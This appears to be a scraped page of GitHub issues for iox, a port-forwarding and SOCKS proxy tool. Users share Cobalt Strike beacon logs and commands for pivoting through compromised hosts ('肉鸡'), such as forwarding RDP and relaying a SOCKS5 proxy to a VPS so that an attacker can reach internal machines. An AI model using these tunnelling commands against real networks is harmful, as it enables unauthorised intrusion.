eddieivan01 / iox Goto Github PK
View Code? Open in Web Editor NEWTool for port forwarding & intranet proxy
License: MIT License
Tool for port forwarding & intranet proxy
License: MIT License
Can someone please help me the equivalent of this command with IOX
rportfwd [bind port] [forward host] [forward port] --- > this is the way I can do it in Cobalt strike
How can I do it with IOX?
for example if I am doing this in Cobalt rportfwd 8004 10.8.0.x 443 how would I do it with IOX?
情况:A 端能正向访问 B 端的某个端口,想通过 A 端走 socks 服务访问 B 端后的网络,如果在 B 段 iox proxy -l xxx
可以满足需求,但这样如果连接过多 A 端与 B 端的TCP连接会很多,并且 A -> B 的socks 暂时是明文的
解决思路:iox 支持正向 proxy 功能, A -> B 建立 iox 的多路复用连接,在 A 端开启 socks 连接到 B 端
如:
A: iox rproxy -l 1080 -r B:111
B: iox rproxy -l 111
在vps:
./iox proxy -l 9999 -l 1080
在被控肉鸡:
./iox proxy -l 1080
然后在./iox proxy -r 1.1.1.1:9999
要是能设计成./iox proxy -l 1080 -r 1.1.1.1:9999
本地开启sokcs5服务并转发到远程, 一条命令不就更加清晰了嘛
==================================
然而使用端口转发的socks服务更加稳定:
vps:
iox fwd -l 9999 -l 1080
肉鸡:
iox proxy -l 1080
启动socks5服务
iox fwd -r 127.0.0.1:1080 -r 1.1.1.1:9999
将本地socks5服务转发到vps
攻击者:
curl -x "socks5://1.1.1.1:1080" -s -k http://10.0.0.1:9200
Can someone please help me the equivalent of this command with IOX
rportfwd [bind port] [forward host] [forward port] --- > this is the way I can do it in Cobalt strike
How can I do it with IOX?
for example if I am doing this in Cobalt rportfwd 8004 10.8.0.x 443 how would I do it with IOX?
any idea why the tool si giving me this error
beacon> shell iox.exe fwd -l 9004 -r 10.8.0.86:443
[] Tasked beacon to run: iox.exe fwd -l 9004 -r 10.8.0.86:443
[+] host called home, sent: 67 bytes
[+] received output:
[] Forward between :9004 and 10.8.0.86:443
[+] received output:
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout
[+] received output:
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout
[+] received output:
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout
[+] received output:
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout
[+] received output:
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout
Malformed args. The number of -l
and -n
is wrong
是否应该修改为:
Malformed args. The number of -l
and -r
is wrong
请求添加docker 方案,3proxy 直接被抓包了,且容器堵住
hi.
在服务器上,我运行了:
iox proxy -l 19999 -k 000102
在本机上,我运行了:
iox fwd -l 1081 -r VPS-public-ip:19999 -k 000102
然后设置本地机器上的浏览器的socks5代理为127.0.0.1:1081,浏览器确实可以翻墙,但从2边的参数看,总感觉没有做加密处理似的。
谢谢回复
作者你好,请问一下fwd与proxy两种模式各表示什么意思呢,本人为初学者,望答知
启用代理时默认为ipv6,怎么改ipv4
[+] C:\Windows\system32\cmd.exe /C iox.exe proxy -r xxxx:9999 :
[!] Control connection has been closed, exit now
keep getting this issue
keep getting this error when I try to run the port forward [*] Tasked beacon to list files in . [+] host called home, sent: 19 bytes [-] could not open C:\Windows\Temp\*: 5 [*] cd c:\users\public [*] Tasked beacon to upload /root/Downloads/taowu-cobalt-strike-english/script/iox.exe as iox.exe [+] host called home, sent: 1046589 bytes [+] host called home, sent: 1040460 bytes [+] host called home, sent: 228371 bytes [*] Tasked beacon to run: iox.exe fwd -r 127.0.0.1:3389 -r *8.8.8.8:3389 -k 65535 [+] host called home, sent: 86 bytes [+] received output: Not hexadecimal string
感谢作者,希望还能更新,起码有个重要的功能,就是socks5加上用户密码认证能加上,否则太不安全了。感谢
大佬,请问0.5版本什么时候发布啊,我看已经有0.5的分支了。
使用chrome等浏览器挂上socks5代理后,通常访问一个网页会建立多个tcp链接,从netio代码看会导致server与client间建立多个tcp连接,能否加入多路复用功能,使用一个tcp连接进行控制,一个tcp连接传输数据?
小白,这个真不知道咋解决。
在本地 0.0.0.0:1080启动Socks5服务
./iox proxy -l 1080
加上用户名密码防止被扫描到利用
类似cobalt strike 直接加上端口,用户名密码即可使用
HI, GUYS YOUR TOOL IS SO COOL BUT.. THERE ARE SOME UNFIRENDLY CONNECTIONS.....
socks5代理能否加入密码验证功能?如果将开启的socks5代理转发到公网IP,没有密码验证,很不安全
例如在iox.conf文件中分段填写好不同的转发规则
然后利用-c 加载配置文件,方便管理
./iox -c iox.conf
iox监听得内容在非tcp协议等情况下被人访问了端口就会自动退出,是否有继续监听得选项?不需要人工运行。
能否给出一个反向s5搭建多级代理的参考用法
对不起, 眼挫了, 确实proxy模式下就总共两条命令就可||&_&||
很好用的工具,希望能支持sock4 和 http代理
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.